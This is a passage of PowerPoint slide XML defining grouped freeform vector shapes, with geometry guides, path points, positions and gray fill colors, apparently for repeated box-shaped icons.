                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T1" fmla="*/ 501 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T3" fmla="*/ 437 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T5" fmla="*/ 437 h 2434"/>
                            <a:gd name="T6" fmla="*/ 234 w 1866"/>
                            <a:gd name="T7" fmla="*/ 64 h 2434"/>
                            <a:gd name="T8" fmla="*/ 234 w 1866"/>
                            <a:gd name="T9" fmla="*/ 64 h 2434"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 0 h 2434"/>
                            <a:gd name="T12" fmla="*/ 0 w 1866"/>
                            <a:gd name="T13" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T14" fmla="*/ 234 w 1866"/>
                            <a:gd name="T15" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T16" fmla="*/ 234 w 1866"/>
                            <a:gd name="T17" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T18" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T19" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T20" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T21" fmla="*/ 501 h 2434"/>
                            <a:gd name="T22" fmla="*/ 234 w 1866"/>
                            <a:gd name="T23" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T24" fmla="*/ 234 w 1866"/>
                            <a:gd name="T25" fmla="*/ 305 h 2434"/>
                            <a:gd name="T26" fmla="*/ 234 w 1866"/>
                            <a:gd name="T27" fmla="*/ 305 h 2434"/>
                            <a:gd name="T28" fmla="*/ 1630 w 1866"/>
                            <a:gd name="T29" fmla="*/ 681 h 2434"/>
                            <a:gd name="T30" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T31" fmla="*/ 681 h 2434"/>
                            <a:gd name="T32" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T33" fmla="*/ 2129 h 2434"/>
                            <a:gd name="T34" fmla="*/ 234 w 1866"/>
                            <a:gd name="T35" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T36" fmla="*/ 234 w 1866"/>
                            <a:gd name="T37" fmla="*/ 1753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1866" y="501"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="2434"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="501"/>
                              </a:lnTo>
                              <a:close/>
                              <a:moveTo>
                                <a:pt x="234" y="1753"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1630" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="2129"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1753"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="175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45454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93" name="Freeform 109">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CFC7113-2CAC-4F5F-9BE1-1E00F221DFA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E6E6E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777" name="Group 110">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{418B2829-3089-4CE3-BEBC-7550E71FB9FF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 flipH="1">
                        <a:off x="1295" y="2109"/>
                        <a:ext cx="433" cy="341"/>
                        <a:chOff x="585" y="1098"/>
                        <a:chExt cx="662" cy="521"/>
                      </a:xfrm>
                    </p:grpSpPr>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="1784" name="Freeform 111">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BDC2EAA-A36E-4061-A40F-E7EC8453397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331" cy="432"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 500 h 2433"/>
                            <a:gd name="T2" fmla="*/ 0 w 1866"/>
                            <a:gd name="T3" fmla="*/ 2433 h 2433"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 1932 h 2433"/>
                            <a:gd name="T6" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T7" fmla="*/ 1001 h 2433"/>
                            <a:gd name="T8" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T9" fmla="*/ 0 h 2433"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 500 h 24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</a:cxnLst>
                          <a:rect l="0" t="0" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="1866" h="2433">
                              <a:moveTo>
                                <a:pt x="0" y="500"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="2433"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1932"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1001"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0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D6D6D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85" name="Freeform 112">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19FB4EDE-7A93-4850-BD31-51140EE0D14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3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030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86" name="Freeform 113">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8E164FF-EA17-4D57-AB36-5504C4315D5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916" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T3" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 0 h 2434"/>
                            <a:gd name="T6" fmla="*/ 0 w 1866"/>
                            <a:gd name="T7" fmla="*/ 501 h 2434"/>
                            <a:gd name="T8" fmla="*/ 0 w 1866"/>
                            <a:gd name="T9" fmla="*/ 2434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0" y="2434"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="501"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="243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28282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87" name="Freeform 114">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB80573B-A656-4093-BC7A-6848D50D3D9C}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr>
                          <a:spLocks noEditPoints="1"/>
                        </p:cNvSpPr>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr bwMode="gray">
                        <a:xfrm>
                          <a:off x="585" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T1" fmla="*/ 501 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T3" fmla="*/ 437 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T5" fmla="*/ 437 h 2434"/>
                            <a:gd name="T6" fmla="*/ 234 w 1866"/>
                            <a:gd name="T7" fmla="*/ 64 h 2434"/>
                            <a:gd name="T8" fmla="*/ 234 w 1866"/>
                            <a:gd name="T9" fmla="*/ 64 h 2434"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 0 h 2434"/>
                            <a:gd name="T12" fmla="*/ 0 w 1866"/>
                            <a:gd name="T13" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T14" fmla="*/ 234 w 1866"/>
                            <a:gd name="T15" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T16" fmla="*/ 234 w 1866"/>
                            <a:gd name="T17" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T18" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T19" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T20" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T21" fmla="*/ 501 h 2434"/>
                            <a:gd name="T22" fmla="*/ 234 w 1866"/>
                            <a:gd name="T23" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T24" fmla="*/ 234 w 1866"/>
                            <a:gd name="T25" fmla="*/ 305 h 2434"/>
                            <a:gd name="T26" fmla="*/ 234 w 1866"/>
                            <a:gd name="T27" fmla="*/ 305 h 2434"/>
                            <a:gd name="T28" fmla="*/ 1630 w 1866"/>
                            <a:gd name="T29" fmla="*/ 681 h 2434"/>
                            <a:gd name="T30" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T31" fmla="*/ 681 h 2434"/>
                            <a:gd name="T32" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T33" fmla="*/ 2129 h 2434"/>
                            <a:gd name="T34" fmla="*/ 234 w 1866"/>
                            <a:gd name="T35" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T36" fmla="*/ 234 w 1866"/>
                            <a:gd name="T37" fmla="*/ 1753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1866" y="501"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="2434"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="501"/>
                              </a:lnTo>
                              <a:close/>
                              <a:moveTo>
                                <a:pt x="234" y="1753"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1630" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="2129"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1753"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="175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45454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88" name="Freeform 115">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C57BE398-1DEC-443C-9ACF-CDD2D0E0104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E6E6E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778" name="Group 116">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9DEA7A7-0A16-4F2A-B3E2-0D21BEC4320D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 flipH="1">
                        <a:off x="1079" y="2167"/>
                        <a:ext cx="433" cy="341"/>
                        <a:chOff x="585" y="1098"/>
                        <a:chExt cx="662" cy="521"/>
                      </a:xfrm>
                    </p:grpSpPr>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="1779" name="Freeform 117">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C79C436-F73A-4B12-9278-37E34B97FEB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331" cy="432"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 500 h 2433"/>
                            <a:gd name="T2" fmla="*/ 0 w 1866"/>
                            <a:gd name="T3" fmla="*/ 2433 h 2433"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 1932 h 2433"/>
                            <a:gd name="T6" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T7" fmla="*/ 1001 h 2433"/>
                            <a:gd name="T8" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T9" fmla="*/ 0 h 2433"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 500 h 24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</a:cxnLst>
                          <a:rect l="0" t="0" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="1866" h="2433">
                              <a:moveTo>
                                <a:pt x="0" y="500"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="2433"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1932"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1001"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0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D6D6D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80" name="Freeform 118">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2D47C55-0B5F-4EF0-A38C-645A69B3399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3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030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81" name="Freeform 119">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{880F5D5E-0CCF-42DF-8714-227DF0145F2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916" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T3" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 0 h 2434"/>
                            <a:gd name="T6" fmla="*/ 0 w 1866"/>
                            <a:gd name="T7" fmla="*/ 501 h 2434"/>
                            <a:gd name="T8" fmla="*/ 0 w 1866"/>
                            <a:gd name="T9" fmla="*/ 2434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0" y="2434"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="501"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="243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28282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82" name="Freeform 120">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{983F3571-85C6-4F85-8B35-0A576D361CBE}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr>
                          <a:spLocks noEditPoints="1"/>
                        </p:cNvSpPr>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr bwMode="gray">
                        <a:xfrm>
                          <a:off x="585" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T1" fmla="*/ 501 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T3" fmla="*/ 437 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T5" fmla="*/ 437 h 2434"/>
                            <a:gd name="T6" fmla="*/ 234 w 1866"/>
                            <a:gd name="T7" fmla="*/ 64 h 2434"/>
                            <a:gd name="T8" fmla="*/ 234 w 1866"/>
                            <a:gd name="T9" fmla="*/ 64 h 2434"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 0 h 2434"/>
                            <a:gd name="T12" fmla="*/ 0 w 1866"/>
                            <a:gd name="T13" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T14" fmla="*/ 234 w 1866"/>
                            <a:gd name="T15" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T16" fmla="*/ 234 w 1866"/>
                            <a:gd name="T17" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T18" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T19" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T20" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T21" fmla="*/ 501 h 2434"/>
                            <a:gd name="T22" fmla="*/ 234 w 1866"/>
                            <a:gd name="T23" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T24" fmla="*/ 234 w 1866"/>
                            <a:gd name="T25" fmla="*/ 305 h 2434"/>
                            <a:gd name="T26" fmla="*/ 234 w 1866"/>
                            <a:gd name="T27" fmla="*/ 305 h 2434"/>
                            <a:gd name="T28" fmla="*/ 1630 w 1866"/>
                            <a:gd name="T29" fmla="*/ 681 h 2434"/>
                            <a:gd name="T30" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T31" fmla="*/ 681 h 2434"/>
                            <a:gd name="T32" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T33" fmla="*/ 2129 h 2434"/>
                            <a:gd name="T34" fmla="*/ 234 w 1866"/>
                            <a:gd name="T35" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T36" fmla="*/ 234 w 1866"/>
                            <a:gd name="T37" fmla="*/ 1753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1866" y="501"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="2434"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="501"/>
                              </a:lnTo>
                              <a:close/>
                              <a:moveTo>
                                <a:pt x="234" y="1753"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1630" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="681"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="2129"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1753"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="175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45454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83" name="Freeform 121">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F203F0E-F6F6-4F01-9C73-98BB64AD1EE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E6E6E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743" name="Group 122">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B38426C-D69D-4889-AFEF-2D15C129CE7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079" y="1709"/>
                      <a:ext cx="1300" cy="574"/>
                      <a:chOff x="1079" y="1709"/>
                      <a:chExt cx="1300" cy="574"/>
                    </a:xfrm>
                  </p:grpSpPr>
                  <p:grpSp>
                    <p:nvGrpSpPr>
                      <p:cNvPr id="1744" name="Group 123">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C4FE81C-CA25-4591-82D3-D554192FCD2B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 flipH="1">
                        <a:off x="1946" y="1709"/>
                        <a:ext cx="433" cy="341"/>
                        <a:chOff x="585" y="1098"/>
                        <a:chExt cx="662" cy="521"/>
                      </a:xfrm>
                    </p:grpSpPr>
                    <p:sp>
                      <p:nvSpPr>
                        <p:cNvPr id="1769" name="Freeform 124">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99902FE7-13B1-4CFB-9C6E-5C70540E240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331" cy="432"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 500 h 2433"/>
                            <a:gd name="T2" fmla="*/ 0 w 1866"/>
                            <a:gd name="T3" fmla="*/ 2433 h 2433"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 1932 h 2433"/>
                            <a:gd name="T6" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T7" fmla="*/ 1001 h 2433"/>
                            <a:gd name="T8" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T9" fmla="*/ 0 h 2433"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 500 h 24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</a:cxnLst>
                          <a:rect l="0" t="0" r="r" b="b"/>
                          <a:pathLst>
                            <a:path w="1866" h="2433">
                              <a:moveTo>
                                <a:pt x="0" y="500"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="0" y="2433"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1932"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1001"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0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D6D6D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70" name="Freeform 125">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86EB6B68-B8E5-4363-9AB5-0764178FE3D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3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030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71" name="Freeform 126">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AFC2BE5C-BAAC-4103-9B78-98779672772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916" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 0 w 1866"/>
                            <a:gd name="T1" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T3" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T5" fmla="*/ 0 h 2434"/>
                            <a:gd name="T6" fmla="*/ 0 w 1866"/>
                            <a:gd name="T7" fmla="*/ 501 h 2434"/>
                            <a:gd name="T8" fmla="*/ 0 w 1866"/>
                            <a:gd name="T9" fmla="*/ 2434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0" y="2434"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1866" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="501"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="243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28282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72" name="Freeform 127">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1DFBE15-0847-4CB7-B443-EC2702223E6B}"/>
                            </a:ext>
                          </a:extLst>
                        </p:cNvPr>
                        <p:cNvSpPr>
                          <a:spLocks noEditPoints="1"/>
                        </p:cNvSpPr>
                        <p:nvPr/>
                      </p:nvSpPr>
                      <p:spPr bwMode="gray">
                        <a:xfrm>
                          <a:off x="585" y="1186"/>
                          <a:ext cx="331" cy="433"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T1" fmla="*/ 501 h 2434"/>
                            <a:gd name="T2" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T3" fmla="*/ 437 h 2434"/>
                            <a:gd name="T4" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T5" fmla="*/ 437 h 2434"/>
                            <a:gd name="T6" fmla="*/ 234 w 1866"/>
                            <a:gd name="T7" fmla="*/ 64 h 2434"/>
                            <a:gd name="T8" fmla="*/ 234 w 1866"/>
                            <a:gd name="T9" fmla="*/ 64 h 2434"/>
                            <a:gd name="T10" fmla="*/ 0 w 1866"/>
                            <a:gd name="T11" fmla="*/ 0 h 2434"/>
                            <a:gd name="T12" fmla="*/ 0 w 1866"/>
                            <a:gd name="T13" fmla="*/ 1933 h 2434"/>
                            <a:gd name="T14" fmla="*/ 234 w 1866"/>
                            <a:gd name="T15" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T16" fmla="*/ 234 w 1866"/>
                            <a:gd name="T17" fmla="*/ 1997 h 2434"/>
                            <a:gd name="T18" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T19" fmla="*/ 2434 h 2434"/>
                            <a:gd name="T20" fmla="*/ 1866 w 1866"/>
                            <a:gd name="T21" fmla="*/ 501 h 2434"/>
                            <a:gd name="T22" fmla="*/ 234 w 1866"/>
                            <a:gd name="T23" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T24" fmla="*/ 234 w 1866"/>
                            <a:gd name="T25" fmla="*/ 305 h 2434"/>
                            <a:gd name="T26" fmla="*/ 234 w 1866"/>
                            <a:gd name="T27" fmla="*/ 305 h 2434"/>
                            <a:gd name="T28" fmla="*/ 1630 w 1866"/>
                            <a:gd name="T29" fmla="*/ 681 h 2434"/>
                            <a:gd name="T30" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T31" fmla="*/ 681 h 2434"/>
                            <a:gd name="T32" fmla="*/ 1632 w 1866"/>
                            <a:gd name="T33" fmla="*/ 2129 h 2434"/>
                            <a:gd name="T34" fmla="*/ 234 w 1866"/>
                            <a:gd name="T35" fmla="*/ 1753 h 2434"/>
                            <a:gd name="T36" fmla="*/ 234 w 1866"/>
                            <a:gd name="T37" fmla="*/ 1753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1866" y="501"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1632" y="437"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="64"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="1933"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="1997"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="2434"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="1866" y="501"/>
                              </a:lnTo>
                              <a:close/>
                              <a:moveTo>
                                <a:pt x="234" y="1753"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="234" y="305"/>
                              </a:lnTo>
                              <a:lnTo>
